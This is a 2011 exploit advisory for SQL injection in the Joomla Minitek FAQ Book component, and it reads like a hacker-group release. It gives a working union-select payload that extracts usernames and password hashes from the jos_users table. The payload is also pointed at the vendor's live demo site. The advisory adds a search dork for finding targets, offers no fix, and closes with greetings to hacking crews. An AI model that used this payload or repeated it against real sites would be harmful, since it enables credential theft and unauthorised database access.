############################################################################################################# ## Joomla Component Minitek FAQ Book SQL injection ## ## Author : kaMtiEz (kamtiez@exploit-id.com) ## ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ## ## Date : 11 June, 2011 ## ############################################################################################################# [ Software Information ] [+] Vendor : http://www.minitek.gr/ [+] Download : http://www.minitek.gr/extensions/joomla-16/joomla-16-free-extensions/item/33-faq-book.html [+] version : 1.3 or lower maybe also affected [+] Vulnerability : SQLi [+] Dork : "CiHuY" [+] LOCATION : INDONESIA - JOGJA ############################################################################################################# [ Vulnerable File ] http://127.0.0.1/[kaMtiEz]/faq-book?view=category&id=[SQLi] [SQLi] -7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users-- [ DEMO ] http://www.minitek.gr/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users-- [ FIX ] dunno :"> ############################################################################################################# [ Thx TO ] [+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9 [+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s13doeL,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,ulow [+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,kampreto [+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D [ NOTE ] [+] edan tenan rasane atiku ... [+] yowes ora popo :) [ QUOTE ] [+] INDONESIANCODER still r0x [+] nothing secure ..